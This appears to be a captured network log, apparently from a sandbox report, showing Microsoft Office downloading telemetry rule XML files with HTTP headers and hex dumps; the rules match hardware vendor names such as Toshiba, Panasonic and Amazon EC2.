                            2024-11-14 22:38:57 UTC420INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O


                            Session IDSource IPSource PortDestination IPDestination Port
                            44192.168.2.45517113.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:38:57 UTC192OUTGET /rules/rule120636v0s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:38:57 UTC491INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:38:57 GMT
                            Content-Type: text/xml
                            Content-Length: 472
                            Connection: close
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                            ETag: "0x8DC582B9D43097E"
                            x-ms-request-id: c6b44c52-001e-0028-1ef0-2cc49f000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223857Z-16547b76f7fcrtpchC1DFW52e80000000m6g000000010sqa
                            x-fd-int-roxy-purgeid: 0
                            X-Cache: TCP_HIT
                            X-Cache-Info: L1_T2
                            Accept-Ranges: bytes
                            2024-11-14 22:38:57 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                            Session IDSource IPSource PortDestination IPDestination Port
                            45192.168.2.45517213.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:38:57 UTC192OUTGET /rules/rule120637v0s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:38:57 UTC491INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:38:57 GMT
                            Content-Type: text/xml
                            Content-Length: 427
                            Connection: close
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT
                            ETag: "0x8DC582BA909FA21"
                            x-ms-request-id: 2e60cfa9-601e-005c-390f-36f06f000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223857Z-1866b5c5fbbldb6rhC1DFW4bew00000000q0000000007405
                            x-fd-int-roxy-purgeid: 0
                            X-Cache: TCP_HIT
                            X-Cache-Info: L1_T2
                            Accept-Ranges: bytes
                            2024-11-14 22:38:57 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                            Session IDSource IPSource PortDestination IPDestination Port
                            46192.168.2.45517313.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:38:57 UTC192OUTGET /rules/rule120638v0s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:38:58 UTC491INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:38:57 GMT
                            Content-Type: text/xml
                            Content-Length: 486
                            Connection: close
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT
                            ETag: "0x8DC582B92FCB436"
                            x-ms-request-id: a9c4265b-101e-000b-57af-365e5c000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223857Z-16547b76f7fxdzxghC1DFWmf7n0000000mb000000000p4gz
                            x-fd-int-roxy-purgeid: 0
                            X-Cache-Info: L1_T2
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
                            2024-11-14 22:38:58 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                            Session IDSource IPSource PortDestination IPDestination Port
                            47192.168.2.45517413.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:38:58 UTC192OUTGET /rules/rule120639v0s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:38:58 UTC491INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:38:58 GMT
                            Content-Type: text/xml
                            Content-Length: 423
                            Connection: close
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT
                            ETag: "0x8DC582BB7564CE8"
                            x-ms-request-id: 754da625-801e-0067-47ce-36fe30000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223858Z-r178fb8d7656shmjhC1DFWu5kw00000003900000000017u4
                            x-fd-int-roxy-purgeid: 0
                            X-Cache: TCP_HIT
                            X-Cache-Info: L1_T2
                            Accept-Ranges: bytes
                            2024-11-14 22:38:58 UTC423INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0


                            Session IDSource IPSource PortDestination IPDestination Port
                            48192.168.2.45517513.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:38:58 UTC192OUTGET /rules/rule120640v0s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:38:58 UTC470INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:38:58 GMT
                            Content-Type: text/xml
                            Content-Length: 478
                            Connection: close
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT
                            ETag: "0x8DC582B9B233827"
                            x-ms-request-id: 7ef17957-a01e-0084-1674-359ccd000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223858Z-1749fc9bdbdgs9sshC1DFWt6ws000000039g00000000ce00
                            x-fd-int-roxy-purgeid: 0
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
                            2024-11-14 22:38:58 UTC478INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                            Session IDSource IPSource PortDestination IPDestination Port
                            49192.168.2.45517613.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:38:58 UTC192OUTGET /rules/rule120641v0s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:38:58 UTC491INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:38:58 GMT
                            Content-Type: text/xml
                            Content-Length: 404
                            Connection: close
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                            ETag: "0x8DC582B95C61A3C"
                            x-ms-request-id: 140e2611-e01e-003c-3f87-36c70b000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223858Z-r178fb8d765z9wvrhC1DFW1a0s000000019g00000000fy1h
                            x-fd-int-roxy-purgeid: 0
                            X-Cache: TCP_HIT
                            X-Cache-Info: L1_T2
                            Accept-Ranges: bytes
                            2024-11-14 22:38:58 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                            Session IDSource IPSource PortDestination IPDestination Port
                            50192.168.2.45517713.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:38:58 UTC192OUTGET /rules/rule120642v0s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:38:58 UTC491INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:38:58 GMT
                            Content-Type: text/xml
                            Content-Length: 468
                            Connection: close
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT
                            ETag: "0x8DC582BB046B576"
                            x-ms-request-id: 2d611ff0-901e-002a-3d01-2d7a27000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223858Z-16547b76f7fkj7j4hC1DFW0a9g0000000mb0000000001wbm
                            x-fd-int-roxy-purgeid: 0
                            X-Cache: TCP_HIT
                            X-Cache-Info: L1_T2
                            Accept-Ranges: bytes
                            2024-11-14 22:38:58 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                            Session IDSource IPSource PortDestination IPDestination Port
                            51192.168.2.45517813.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:38:58 UTC192OUTGET /rules/rule120643v0s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:38:58 UTC491INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:38:58 GMT
                            Content-Type: text/xml
                            Content-Length: 400
                            Connection: close
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                            ETag: "0x8DC582BB2D62837"
                            x-ms-request-id: f331b341-a01e-0070-670c-36573b000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223858Z-1866b5c5fbbqjkpbhC1DFWt4h400000000m000000000m72w
                            x-fd-int-roxy-purgeid: 0
                            X-Cache: TCP_HIT
                            X-Cache-Info: L1_T2
                            Accept-Ranges: bytes
                            2024-11-14 22:38:58 UTC400INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="


                            Session IDSource IPSource PortDestination IPDestination Port
                            52192.168.2.45517913.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:38:58 UTC192OUTGET /rules/rule120644v0s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:38:59 UTC491INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:38:58 GMT
                            Content-Type: text/xml
                            Content-Length: 479
                            Connection: close
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                            ETag: "0x8DC582BB7D702D0"
                            x-ms-request-id: fb68cf1d-a01e-001e-3b01-2d49ef000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223858Z-16547b76f7fm7xw6hC1DFW5px40000000m7g0000000089k5
                            x-fd-int-roxy-purgeid: 0
                            X-Cache: TCP_HIT
                            X-Cache-Info: L1_T2
                            Accept-Ranges: bytes
                            2024-11-14 22:38:59 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                            Session IDSource IPSource PortDestination IPDestination Port
                            53192.168.2.45518013.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:38:59 UTC192OUTGET /rules/rule120645v0s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:38:59 UTC470INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:38:59 GMT
                            Content-Type: text/xml
                            Content-Length: 425
                            Connection: close
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                            ETag: "0x8DC582BBA25094F"
                            x-ms-request-id: 5a7d27ff-801e-0048-0d40-36f3fb000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223859Z-16547b76f7fljddfhC1DFWeqbs000000017000000000pqzs
                            x-fd-int-roxy-purgeid: 0
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
                            2024-11-14 22:38:59 UTC425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=


                            Session IDSource IPSource PortDestination IPDestination Port
                            54192.168.2.45518113.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:38:59 UTC192OUTGET /rules/rule120646v0s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:38:59 UTC470INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:38:59 GMT
                            Content-Type: text/xml
                            Content-Length: 475
                            Connection: close
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                            ETag: "0x8DC582BB2BE84FD"
                            x-ms-request-id: 32d5e889-e01e-0099-1f00-2dda8a000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223859Z-16547b76f7f7scqbhC1DFW0m5w0000000m3000000000n0r3
                            x-fd-int-roxy-purgeid: 0
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
                            2024-11-14 22:38:59 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
